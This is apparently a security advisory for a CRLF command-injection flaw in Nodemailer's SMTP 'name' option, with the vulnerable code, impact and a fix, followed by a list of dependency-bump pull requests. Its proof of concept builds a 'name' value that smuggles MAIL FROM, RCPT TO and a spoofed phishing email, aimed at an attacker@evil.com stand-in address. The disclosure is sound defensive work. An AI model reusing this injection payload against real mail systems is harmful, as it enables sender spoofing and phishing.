Nodemailer Vulnerable to SMTP Command Injection via CRLF in Transport name Option (EHLO/HELO)
Summary
Nodemailer versions up to and including 8.0.4 are vulnerable to SMTP command injection via CRLF sequences in the transport name configuration option. The name value is used directly in the EHLO/HELO SMTP command without any sanitization for carriage return and line feed characters (\r\n). An attacker who can influence this option can inject arbitrary SMTP commands, enabling unauthorized email sending, email spoofing, and phishing attacks.
Details
The vulnerability exists in lib/smtp-connection/index.js. When establishing an SMTP connection, the name option is concatenated directly into the EHLO command:
// lib/smtp-connection/index.js, line 71
this.name = this.options.name || this._getHostname();
// line 1336
this._sendCommand('EHLO ' + this.name);
The _sendCommand method writes the string directly to the socket followed by \r\n (line 1082):
this._socket.write(Buffer.from(str + '\r\n', 'utf-8'));
If the name option contains \r\n sequences, each injected line is interpreted by the SMTP server as a separate command. Unlike the envelope.from and envelope.to fields which are validated for \r\n (line 1107-1119), and unlike envelope.size which was recently fixed (GHSA-c7w3-x93f-qmm8) by casting to a number, the name parameter receives no CRLF sanitization whatsoever.
This is distinct from the previously reported GHSA-c7w3-x93f-qmm8 (envelope.size injection) as it affects a different parameter (name vs size), uses a different injection point (EHLO command vs MAIL FROM command), and occurs at connection initialization rather than during message sending.
The name option is also used in HELO (line 1384) and LHLO (line 1333) commands with the same lack of sanitization.
PoC
const nodemailer = require('nodemailer');
const net = require('net');
// Simple SMTP server to observe injected commands
const server = net.createServer(socket => {
socket.write('220 test ESMTP\r\n');
socket.on('data', data => {
const lines = data.toString().split('\r\n').filter(l => l);
lines.forEach(line => {
console.log('SMTP CMD:', line);
if (line.startsWith('EHLO') || line.startsWith('HELO'))
socket.write('250 OK\r\n');
else if (line.startsWith('MAIL FROM'))
socket.write('250 OK\r\n');
else if (line.startsWith('RCPT TO'))
socket.write('250 OK\r\n');
else if (line === 'DATA')
socket.write('354 Go\r\n');
else if (line === '.')
socket.write('250 OK\r\n');
else if (line === 'QUIT')
{ socket.write('221 Bye\r\n'); socket.end(); }
else if (line === 'RSET')
socket.write('250 OK\r\n');
});
});
});
server.listen(0, '127.0.0.1', () => {
const port = server.address().port;
// Inject a complete phishing email via EHLO name
const transport = nodemailer.createTransport({
host: '127.0.0.1',
port: port,
secure: false,
name: 'legit.host\r\nMAIL FROM:<attacker@evil.com>\r\n'
+ 'RCPT TO:<victim@target.com>\r\nDATA\r\n'
+ 'From: ceo@company.com\r\nTo: victim@target.com\r\n'
+ 'Subject: Urgent\r\n\r\nPhishing content\r\n.\r\nRSET'
});
transport.sendMail({
from: 'legit@example.com',
to: 'legit-recipient@example.com',
subject: 'Normal email',
text: 'Normal content'
}, () => { server.close(); process.exit(0); });
});
Running this PoC shows the SMTP server receives the injected MAIL FROM, RCPT TO, DATA, and phishing email content as separate SMTP commands before the legitimate email is sent.
Impact
Who is affected: Applications that allow users or external input to configure the name SMTP transport option. This includes:
- Multi-tenant SaaS platforms with per-tenant SMTP configuration
- Admin panels where SMTP hostname/name settings are stored in databases
- Applications loading SMTP config from environment variables or external sources
What can an attacker do:
- Send unauthorized emails to arbitrary recipients by injecting MAIL FROM and RCPT TO commands
- Spoof email senders by injecting arbitrary From headers in the DATA portion
- Conduct phishing attacks using the legitimate SMTP server as a relay
- Bypass application-level controls on email recipients, since the injected commands are processed before the application's intended MAIL FROM/RCPT TO
- Perform SMTP reconnaissance by injecting commands like VRFY or EXPN
The injection occurs at the EHLO stage (before authentication in most SMTP flows), making it particularly dangerous as the injected commands may be processed with the server's trust context.
Recommended fix: Sanitize the name option by stripping or rejecting CRLF sequences, similar to how envelope.from and envelope.to are already validated on lines 1107-1119 of lib/smtp-connection/index.js. For example:
this.name = (this.options.name || this._getHostname()).replace(/[\r\n]/g, '');
Affected Packages
| Ecosystem | Package | Vulnerable Versions | Patched Version |
|---|---|---|---|
| npm |
nodemailer
|
<= 8.0.4 |
8.0.5
|
build(deps): bump the npm_and_yarn group across 1 directory with 10 updates
Open about 12 hours agodeps(deps): bump the minor-and-patch group across 1 directory with 21 updates
Open about 15 hours agochore(deps): bump the npm_and_yarn group across 1 directory with 16 updates
Closed 1 day agodeps(deps): bump the utilities group with 3 updates
Open 1 day agodeps: bump the minor-and-patch group across 1 directory with 4 updates
Open 1 day agoBump the npm_and_yarn group across 2 directories with 17 updates
Closed 2 days agoBump the npm_and_yarn group across 1 directory with 26 updates
Open 2 days agodeps(server): bump the prod-deps group across 1 directory with 6 updates
Open 4 days agobuild(deps): bump the npm_and_yarn group across 11 directories with 7 updates
Open 4 days agochore(deps): bump nodemailer from 6.10.1 to 8.0.5 in /server
Open 5 days agochore(deps): Bump the npm_and_yarn group across 4 directories with 8 updates
Open 5 days agobuild(deps): bump the npm_and_yarn group across 4 directories with 8 updates
Open 5 days agobuild(deps): Bump the npm_and_yarn group across 2 directories with 9 updates
Closed 5 days agochore(deps): Bump the npm_and_yarn group across 4 directories with 8 updates
Closed 6 days agonpm: bump nodemailer from 6.9.7 to 8.0.7
Open 6 days agochore(deps): bump the npm_and_yarn group across 1 directory with 15 updates
Closed 6 days agoBump the npm_and_yarn group across 1 directory with 8 updates
Closed 6 days agobuild(deps): bump the npm_and_yarn group across 3 directories with 9 updates
Open 6 days agochore(deps)(deps): bump the production-dependencies group across 1 directory with 18 updates
Open 6 days agoBump the npm_and_yarn group across 1 directory with 8 updates
Closed 6 days agochore(deps): bump nodemailer from 7.0.11 to 8.0.5 in /apps/studio.giselles.ai in the npm_and_yarn group across 1 directory
Closed 6 days agochore(deps): bump nodemailer from 7.0.13 to 8.0.5
Open 7 days agochore(deps): bump nodemailer and @types/nodemailer
Open 7 days agoBump the npm_and_yarn group across 6 directories with 4 updates
Closed 7 days agochore(deps): bump nodemailer from 6.9.5 to 8.0.7
Open 8 days agochore(deps): bump nodemailer from 6.10.1 to 8.0.7 in /kheti_sahayak_backend
Open 8 days agobuild(deps): bump nodemailer from 6.10.1 to 8.0.7 in /functions
Open 8 days agochore(deps): bump the backend-patch-minor group across 1 directory with 20 updates
Open 8 days agobuild(deps): Bump the npm_and_yarn group across 4 directories with 2 updates
Open 8 days agobuild(deps): Bump nodemailer from 6.10.1 to 8.0.5 in /services/notification-service in the npm_and_yarn group across 1 directory
Closed 8 days agodeps: bump the minor-and-patch group across 1 directory with 4 updates
Closed 9 days agochore(deps): bump nodemailer from 6.10.1 to 8.0.5
Open 9 days agochore(deps): bump the npm_and_yarn group across 11 directories with 12 updates
Closed 9 days agoBump the npm_and_yarn group across 1 directory with 8 updates
Closed 9 days agoBump the dependencies group with 20 updates
Open 9 days agoBump the npm_and_yarn group across 1 directory with 8 updates
Closed 10 days agochore(deps): bump the npm_and_yarn group across 7 directories with 15 updates
Open 10 days agoBump the npm_and_yarn group across 2 directories with 15 updates
Closed 10 days agobuild(deps): bump the npm_and_yarn group across 5 directories with 10 updates
Closed 10 days agochore(deps): bump the npm_and_yarn group across 4 directories with 9 updates
Closed 10 days agobuild(deps): bump the npm_and_yarn group across 2 directories with 8 updates
Open 10 days agochore(deps): bump the npm_and_yarn group across 27 directories with 13 updates
Closed 11 days agoBump the npm_and_yarn group across 29 directories with 12 updates
Closed 11 days agochore(deps): bump the npm_and_yarn group across 1 directory with 10 updates
Closed 12 days agoBump nodemailer from 7.0.13 to 8.0.5 in the npm_and_yarn group across 1 directory
Closed 12 days agochore(deps): bump the npm_and_yarn group across 8 directories with 20 updates
Closed 12 days agochore(deps): bump the npm_and_yarn group across 5 directories with 8 updates
Closed 12 days agochore(deps): bump the npm_and_yarn group across 13 directories with 18 updates
Closed 12 days agochore(deps): bump the npm_and_yarn group across 2 directories with 5 updates
Closed 13 days agoBump the npm_and_yarn group across 13 directories with 21 updates
Open 13 days agoActions
Advisory Details
| Published: | April 08, 2026 about 1 month ago |
| Updated: | April 25, 2026 24 days ago |
| CVSS Score: | 4.9 CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N |
| Source: | Github |
| Classification: | GENERAL |
| UUID: | GSA_kwCzR0hTQS12dmpqLXhjamctZ3I1Z84ABU79 |